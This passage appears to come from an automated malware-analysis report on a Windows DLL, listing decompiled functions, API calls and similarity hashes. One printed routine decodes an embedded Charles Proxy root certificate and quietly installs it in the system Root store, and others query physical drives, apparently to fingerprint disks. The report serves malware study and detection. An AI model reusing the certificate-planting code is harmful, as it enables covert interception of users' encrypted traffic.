                                                                                                                                                0x10004694
                                                                                                                                                0x10004641
                                                                                                                                                0x10004600
                                                                                                                                                0x100046a1
                                                                                                                                                0x100046b4

                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004653
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                • Instruction ID: 5f3268faf400ee4384dde952e7e6cf138bea3fab27ca3dfaa28aee59be70a859
                                                                                                                                                • Opcode Fuzzy Hash: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                • Instruction Fuzzy Hash: BB4119B6408341AFD310CF55D88099BBBE8FBC8294F404E1EF59983255EB71E909CBA7
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001AB20, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001AB20(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}




                                                                                                                                                0x1001ab2f
                                                                                                                                                0x1001ab36

                                                                                                                                                APIs
                                                                                                                                                • VirtualFree.KERNELBASE(?,?,?), ref: 1001AB2F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                • Opcode ID: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                • Instruction ID: c3865ccbcae920e215e079fb98926607579ac42653a45aa6abdb7f6c5b589da4
                                                                                                                                                • Opcode Fuzzy Hash: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                • Instruction Fuzzy Hash: F4C04C7621420CABCB04DF98DCD4CAB77ADAB8CB10B10C508FB1D87200C634F9118BA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 1001F720, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177encryptionCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 52%
                                                                                                                                                			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69);
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root");
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0);
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF20(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF20(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF20(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA30(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}






























                                                                                                                                                0x1001f720
                                                                                                                                                0x1001f720
                                                                                                                                                0x1001f720
                                                                                                                                                0x1001f729
                                                                                                                                                0x1001f730
                                                                                                                                                0x1001f737
                                                                                                                                                0x1001f73e
                                                                                                                                                0x1001f745
                                                                                                                                                0x1001f766
                                                                                                                                                0x1001f77a
                                                                                                                                                0x1001f77f
                                                                                                                                                0x1001f782
                                                                                                                                                0x1001f785
                                                                                                                                                0x1001f789
                                                                                                                                                0x1001f7a3
                                                                                                                                                0x1001f7a9
                                                                                                                                                0x1001f7b3
                                                                                                                                                0x1001f7b9
                                                                                                                                                0x1001f7bf
                                                                                                                                                0x1001f7c0
                                                                                                                                                0x1001f7c5
                                                                                                                                                0x1001f7cc
                                                                                                                                                0x1001f7e2
                                                                                                                                                0x1001f7e8
                                                                                                                                                0x1001f7ef
                                                                                                                                                0x1001f7f9
                                                                                                                                                0x1001f801
                                                                                                                                                0x1001f809
                                                                                                                                                0x1001f817
                                                                                                                                                0x1001f81d
                                                                                                                                                0x1001f822
                                                                                                                                                0x1001f828
                                                                                                                                                0x1001f82f
                                                                                                                                                0x1001f842
                                                                                                                                                0x1001f848
                                                                                                                                                0x1001f84c
                                                                                                                                                0x1001f859
                                                                                                                                                0x1001f85e
                                                                                                                                                0x1001f861
                                                                                                                                                0x1001f864
                                                                                                                                                0x1001f868
                                                                                                                                                0x1001f87b
                                                                                                                                                0x1001f891
                                                                                                                                                0x1001f897
                                                                                                                                                0x1001f8ac
                                                                                                                                                0x1001f8b4
                                                                                                                                                0x1001f8c9
                                                                                                                                                0x1001f8ce
                                                                                                                                                0x1001f8d1
                                                                                                                                                0x1001f8ec
                                                                                                                                                0x1001f8f2
                                                                                                                                                0x1001f8f5
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001f91c
                                                                                                                                                0x1001f921
                                                                                                                                                0x1001f8e3
                                                                                                                                                0x1001f8e3
                                                                                                                                                0x1001f8e6
                                                                                                                                                0x1001f8e6
                                                                                                                                                0x1001f939
                                                                                                                                                0x1001f95d
                                                                                                                                                0x1001f963
                                                                                                                                                0x1001f964
                                                                                                                                                0x1001f969
                                                                                                                                                0x1001f868
                                                                                                                                                0x1001f84c
                                                                                                                                                0x1001f80b
                                                                                                                                                0x1001f80b
                                                                                                                                                0x1001f80b
                                                                                                                                                0x1001f972
                                                                                                                                                0x1001f972
                                                                                                                                                0x1001f97c
                                                                                                                                                0x1001f97c
                                                                                                                                                0x1001f7cc
                                                                                                                                                0x1001f789
                                                                                                                                                0x1001f988

                                                                                                                                                APIs
                                                                                                                                                • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                • API String ID: 3311258246-1857994723
                                                                                                                                                • Opcode ID: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
                                                                                                                                                • Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
                                                                                                                                                • Opcode Fuzzy Hash: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
                                                                                                                                                • Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001D7E0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E1001D7E0(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF20(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF20(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CD70( &_v1596);
					_t94 = E1001CFA0(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}





































                                                                                                                                                0x1001d7e0
                                                                                                                                                0x1001d7ec
                                                                                                                                                0x1001d7f3
                                                                                                                                                0x1001da64
                                                                                                                                                0x00000000
                                                                                                                                                0x1001da64
                                                                                                                                                0x1001d7f9
                                                                                                                                                0x1001d803
                                                                                                                                                0x1001d80d
                                                                                                                                                0x1001d81a
                                                                                                                                                0x1001d831
                                                                                                                                                0x1001d84c
                                                                                                                                                0x1001d852
                                                                                                                                                0x1001d871
                                                                                                                                                0x1001d878
                                                                                                                                                0x1001da3d
                                                                                                                                                0x1001da4c
                                                                                                                                                0x1001da55
                                                                                                                                                0x00000000
                                                                                                                                                0x1001da5f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001da57
                                                                                                                                                0x1001d87e
                                                                                                                                                0x1001d888
                                                                                                                                                0x1001d892
                                                                                                                                                0x1001d89c
                                                                                                                                                0x1001d8a6
                                                                                                                                                0x1001d8b0
                                                                                                                                                0x1001d8ba
                                                                                                                                                0x1001d8eb
                                                                                                                                                0x1001da37
                                                                                                                                                0x00000000
                                                                                                                                                0x1001da37
                                                                                                                                                0x1001d8fa
                                                                                                                                                0x1001da16
                                                                                                                                                0x1001da1a
                                                                                                                                                0x1001da27
                                                                                                                                                0x00000000
                                                                                                                                                0x1001da31
                                                                                                                                                0x00000000
                                                                                                                                                0x1001da29
                                                                                                                                                0x1001d914
                                                                                                                                                0x1001d91f
                                                                                                                                                0x1001d925
                                                                                                                                                0x1001d92c
                                                                                                                                                0x1001d933
                                                                                                                                                0x1001d93a
                                                                                                                                                0x1001d941
                                                                                                                                                0x1001d948
                                                                                                                                                0x1001d94f
                                                                                                                                                0x1001d956
                                                                                                                                                0x1001d95d
                                                                                                                                                0x1001d96f
                                                                                                                                                0x1001d99b
                                                                                                                                                0x1001d9a0
                                                                                                                                                0x1001d9a5
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d9ad
                                                                                                                                                0x1001d9b6
                                                                                                                                                0x1001d9b9
                                                                                                                                                0x1001d9c2
                                                                                                                                                0x1001d9ca
                                                                                                                                                0x1001d9d3
                                                                                                                                                0x1001d9dc
                                                                                                                                                0x1001d9f0
                                                                                                                                                0x1001da00
                                                                                                                                                0x1001da05
                                                                                                                                                0x1001da0a
                                                                                                                                                0x1001da0c
                                                                                                                                                0x1001da0c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001da0a
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001D831
                                                                                                                                                • wsprintfW.USER32 ref: 1001D84C
                                                                                                                                                • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 1001D8E3
                                                                                                                                                • _memset.LIBCMT ref: 1001D96F
                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 1001DA37
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                • String ID: \\.\PhysicalDrive%d
                                                                                                                                                • API String ID: 381188756-2935326385
                                                                                                                                                • Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                • Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
                                                                                                                                                • Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                • Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001DA70, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                			E1001DA70(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018AA0(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF20(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
						E1001D040(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					CloseHandle(_v16);
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}


















                                                                                                                                                0x1001da70
                                                                                                                                                0x1001da78
                                                                                                                                                0x1001da81
                                                                                                                                                0x1001dbf0
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbf0
                                                                                                                                                0x1001da87
                                                                                                                                                0x1001da8e
                                                                                                                                                0x1001da95
                                                                                                                                                0x1001da9f
                                                                                                                                                0x1001dabc
                                                                                                                                                0x1001dac2
                                                                                                                                                0x1001dade
                                                                                                                                                0x1001dae5
                                                                                                                                                0x1001dbce
                                                                                                                                                0x1001dbd4
                                                                                                                                                0x1001dbda
                                                                                                                                                0x1001dbe4
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbeb
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbe6
                                                                                                                                                0x1001daeb
                                                                                                                                                0x1001daf5
                                                                                                                                                0x1001daff
                                                                                                                                                0x1001db09
                                                                                                                                                0x1001db21
                                                                                                                                                0x1001db26
                                                                                                                                                0x1001db58
                                                                                                                                                0x1001db68
                                                                                                                                                0x1001db85
                                                                                                                                                0x1001db9d
                                                                                                                                                0x1001dba2
                                                                                                                                                0x1001dba7
                                                                                                                                                0x1001dba9
                                                                                                                                                0x1001dba9
                                                                                                                                                0x1001dba7
                                                                                                                                                0x1001dbb4
                                                                                                                                                0x1001dbbe
                                                                                                                                                0x1001dbcb
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbc0
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dbc0
                                                                                                                                                0x1001dbbe
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
                                                                                                                                                • String ID: \\.\PhysicalDrive%d
                                                                                                                                                • API String ID: 1858725146-2935326385
                                                                                                                                                • Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                • Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
                                                                                                                                                • Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                • Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001D370, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                			E1001D370(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _v24;
				short _v540;
				char _v1564;
				long _v1568;
				long _v1572;
				intOrPtr _v1576;
